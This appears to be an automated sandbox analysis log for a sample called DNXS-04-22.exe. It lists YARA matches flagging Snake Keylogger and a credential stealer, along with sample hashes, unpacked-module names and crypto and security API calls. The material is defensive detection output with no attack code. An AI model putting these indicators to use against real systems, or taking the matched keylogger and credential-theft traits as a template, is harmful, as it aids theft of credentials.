                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                    Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                    Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                    Source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                    Source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                    Source: 0.2.DNXS-04-22.exe.2e91290.6.raw.unpack, .csLarge array initialization: : array initializer size 33957
                    Source: 0.2.DNXS-04-22.exe.8220000.13.raw.unpack, .csLarge array initialization: : array initializer size 33957
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_02C5DF140_2_02C5DF14
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_05E586B00_2_05E586B0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_05E500400_2_05E50040
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_05E500060_2_05E50006
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075BB5700_2_075BB570
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075BB1380_2_075BB138
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075BB1280_2_075BB128
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075B40700_2_075B4070
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075B20B00_2_075B20B0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075B20A00_2_075B20A0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075BCD700_2_075BCD70
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075BAD000_2_075BAD00
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_075BA8AA0_2_075BA8AA
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_07F335780_2_07F33578
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_07F335680_2_07F33568
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_07FD74C00_2_07FD74C0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_07FD71380_2_07FD7138
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 0_2_07FD71370_2_07FD7137
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0B4F04_2_00D0B4F0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D090A14_2_00D090A1
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0A8584_2_00D0A858
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0D4784_2_00D0D478
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D015F84_2_00D015F8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0C1884_2_00D0C188
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0DAC04_2_00D0DAC0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0AEA84_2_00D0AEA8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D08A584_2_00D08A58
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0CE284_2_00D0CE28
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0C7D84_2_00D0C7D8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0BB384_2_00D0BB38
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D008F04_2_00D008F0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D078F84_2_00D078F8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D078E74_2_00D078E7
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0B4EE4_2_00D0B4EE
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D074904_2_00D07490
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D004984_2_00D00498
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D048804_2_00D04880
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D074A04_2_00D074A0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D02C574_2_00D02C57
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D000404_2_00D00040
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0A84F4_2_00D0A84F
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0D4764_2_00D0D476
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D070104_2_00D07010
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D000134_2_00D00013
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D038084_2_00D03808
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D070204_2_00D07020
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D055D94_2_00D055D9
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D085F14_2_00D085F1
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D055E84_2_00D055E8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0819A4_2_00D0819A
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0C1864_2_00D0C186
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D011A04_2_00D011A0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D081A84_2_00D081A8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D07D504_2_00D07D50
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D07D404_2_00D07D40
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D00D484_2_00D00D48
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D02D004_2_00D02D00
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D05EC04_2_00D05EC0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D05EB04_2_00D05EB0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0AEA44_2_00D0AEA4
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0DAAF4_2_00D0DAAF
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D05A584_2_00D05A58
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D08A484_2_00D08A48
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D05A684_2_00D05A68
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0CE184_2_00D0CE18
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D086004_2_00D08600
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0C7D64_2_00D0C7D6
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D06BC84_2_00D06BC8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D03B804_2_00D03B80
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D06BB84_2_00D06BB8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D067704_2_00D06770
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D067604_2_00D06760
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D063184_2_00D06318
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D063084_2_00D06308
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00D0BB344_2_00D0BB34
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00E2D89C4_2_00E2D89C
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00E2D8904_2_00E2D890
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00E2DEA14_2_00E2DEA1
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00E2BFEC4_2_00E2BFEC
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_00F547584_2_00F54758
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CB3884_2_028CB388
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CC1F04_2_028CC1F0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028C61684_2_028C6168
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CC7B14_2_028CC7B1
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CC4D04_2_028CC4D0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CCA914_2_028CCA91
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028C4B314_2_028C4B31
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028C98B84_2_028C98B8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028C68E04_2_028C68E0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CBF104_2_028CBF10
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CBC324_2_028CBC32
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CF4E84_2_028CF4E8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028C35C84_2_028C35C8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CEA084_2_028CEA08
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CE9F84_2_028CE9F8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_028CF9414_2_028CF941
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_06770C604_2_06770C60
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067700404_2_06770040
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067744904_2_06774490
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067790804_2_06779080
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_06771DE04_2_06771DE0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067789B04_2_067789B0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677D2684_2_0677D268
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677CE104_2_0677CE10
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677CE014_2_0677CE01
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677D6C04_2_0677D6C0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677DF704_2_0677DF70
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677DB184_2_0677DB18
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677DB094_2_0677DB09
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677E3C84_2_0677E3C8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677EC784_2_0677EC78
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_06770C504_2_06770C50
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677E8204_2_0677E820
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067700074_2_06770007
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067780084_2_06778008
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677C0F74_2_0677C0F7
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677F0D04_2_0677F0D0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067710C04_2_067710C0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677F0C04_2_0677F0C0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067710B04_2_067710B0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067744804_2_06774480
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067719704_2_06771970
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677C5604_2_0677C560
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677C5504_2_0677C550
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067715204_2_06771520
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677F5284_2_0677F528
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067715104_2_06771510
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677C1084_2_0677C108
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_06771DD04_2_06771DD0
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677C9B84_2_0677C9B8
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677C9A94_2_0677C9A9
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_067719804_2_06771980
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677F9804_2_0677F980
                    Source: DNXS-04-22.exe, 00000000.00000000.1329973525.0000000000956000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJWXz.exe> vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000000.00000002.1359852790.0000000002EE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000000.00000002.1359852790.0000000002E61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000000.00000002.1367508302.0000000007830000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000000.00000002.1341429256.0000000000E0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000000.00000002.1370880618.0000000008220000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs DNXS-04-22.exe
                    Source: DNXS-04-22.exe, 00000004.00000002.3785108965.0000000000B57000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DNXS-04-22.exe
                    Source: DNXS-04-22.exeBinary or memory string: OriginalFilenameJWXz.exe> vs DNXS-04-22.exe
                    Source: DNXS-04-22.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                    Source: DNXS-04-22.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, 2Ac.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, 2Ac.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, XG.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, 2Ac.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, 2Ac.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, mY3IKt45gSW4nI9Ksv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, Peg1g2OxAAvUkWnl1y.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.DNXS-04-22.exe.7830000.12.raw.unpack, mY3IKt45gSW4nI9Ksv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.DNXS-04-22.exe.41770f0.9.raw.unpack, Peg1g2OxAAvUkWnl1y.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
